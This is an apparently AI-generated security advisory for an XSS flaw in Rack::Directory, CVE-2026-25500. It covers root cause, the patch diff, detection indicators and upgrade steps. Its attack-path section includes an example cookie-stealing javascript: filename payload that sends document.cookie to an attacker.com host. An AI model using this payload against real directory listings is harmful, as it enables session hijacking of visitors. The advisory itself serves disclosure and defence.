CVE-2026-25500 Overview
CVE-2026-25500 is a Cross-Site Scripting (XSS) vulnerability in Rack, the modular Ruby web server interface. The vulnerability exists in the Rack::Directory component, which generates HTML directory indexes. When a file exists on disk with a basename starting with the javascript: scheme (e.g., javascript:alert(1)), the generated index contains an anchor element whose href attribute is set directly to the malicious filename. Clicking on such an entry executes JavaScript code in the user's browser context.
Critical Impact
Attackers who can create files on the server with specially crafted filenames can execute arbitrary JavaScript in visitors' browsers, potentially leading to session hijacking, credential theft, or further exploitation of authenticated users.
Affected Products
- Rack versions prior to 2.2.22
- Rack versions prior to 3.1.20
- Rack versions prior to 3.2.5
Discovery Timeline
- 2026-02-18 - CVE CVE-2026-25500 published to NVD
- 2026-02-19 - Last updated in NVD database
Technical Details for CVE-2026-25500
Vulnerability Analysis
The vulnerability is classified as CWE-79 (Improper Neutralization of Input During Web Page Generation), commonly known as Cross-Site Scripting (XSS). The root cause lies in how Rack::Directory constructs hyperlinks in the generated HTML directory listing. When iterating through files in a directory, the component creates anchor tags where the href attribute is populated directly from the filename without proper sanitization or path prefixing.
The attack requires an adversary to have the ability to create files on the server filesystem—this could be through file upload functionality, compromised credentials, or other means. Once a malicious file is created with a name like javascript:alert(1), any user browsing the directory listing will see this as a clickable link that executes JavaScript when clicked.
Root Cause
The vulnerability stems from insufficient output encoding in the DIR_FILE template constant within lib/rack/directory.rb. The original implementation directly interpolates the filename into the href attribute without ensuring it's treated as a relative path. This allows the javascript: URI scheme to be interpreted as executable script rather than a file reference.
Attack Vector
An attacker exploits this vulnerability through the following attack path:
- Gain write access to a directory served by Rack::Directory (via file upload, compromised credentials, or other vectors)
- Create a file with a javascript: prefixed filename containing malicious code (e.g., javascript:document.location='https://attacker.com/steal?cookie='+document.cookie)
- Wait for a victim to browse the directory listing
- When the victim clicks the malicious file entry, the JavaScript executes in their browser context
The fix introduces a ./ prefix to the href attribute, ensuring the filename is always treated as a relative path rather than a URI scheme:
# Before (vulnerable):
DIR_FILE = "<tr><td class='name'><a href='%s'>%s</a></td><td class='size'>%s</td><td class='type'>%s</td><td class='mtime'>%s</td></tr>\n"
# After (patched):
DIR_FILE = "<tr><td class='name'><a href='./%s'>%s</a></td><td class='size'>%s</td><td class='type'>%s</td><td class='mtime'>%s</td></tr>\n"
Source: GitHub Rack Commit Change
Detection Methods for CVE-2026-25500
Indicators of Compromise
- Files in web-accessible directories with names starting with javascript:, data:, or other executable URI schemes
- Unusual filenames containing HTML entities, script tags, or encoded payloads
- Web server logs showing requests for files with suspicious scheme-prefixed names
Detection Strategies
- Implement file integrity monitoring to detect creation of files with unusual naming patterns in directories served by Rack::Directory
- Deploy web application firewalls (WAF) with rules to detect and block directory traversal or XSS-related patterns in URL paths
- Use static analysis tools to identify use of Rack::Directory in application codebases and verify patched versions are deployed
Monitoring Recommendations
- Monitor file creation events in directories exposed via Rack::Directory for filenames containing URI scheme prefixes
- Enable browser Content Security Policy (CSP) headers to mitigate execution of inline scripts even if XSS is triggered
- Review access logs for directory listing requests followed by anomalous JavaScript-prefixed path requests
How to Mitigate CVE-2026-25500
Immediate Actions Required
- Upgrade Rack to version 2.2.22, 3.1.20, or 3.2.5 or later immediately
- Audit existing directories served by Rack::Directory for files with malicious naming patterns
- Consider disabling Rack::Directory if not strictly required for application functionality
- Implement Content Security Policy headers to reduce XSS impact
Patch Information
The Rack maintainers have released patched versions addressing this vulnerability. The fix is available in versions 2.2.22, 3.1.20, and 3.2.5. The patch modifies the DIR_FILE template in lib/rack/directory.rb to prefix all file links with ./, ensuring filenames are interpreted as relative paths rather than URI schemes.
For detailed patch information, see the GitHub Security Advisory GHSA-whrj-4476-wvmp and the GitHub Rack Commit Change.
Workarounds
- Remove Rack::Directory from the middleware stack if directory listing functionality is not required
- Implement a custom middleware layer that sanitizes filenames before they reach Rack::Directory
- Configure file upload restrictions to reject filenames containing : or other URI scheme indicators
- Use a reverse proxy or web server to serve static files instead of Rack::Directory
# Verify your Rack version and upgrade if necessary
bundle show rack
bundle update rack --conservative
# Or specify minimum version in Gemfile
echo "gem 'rack', '>= 3.2.5'" >> Gemfile
bundle install
Disclaimer: This content was generated using AI. While we strive for accuracy, please verify critical information with official sources.
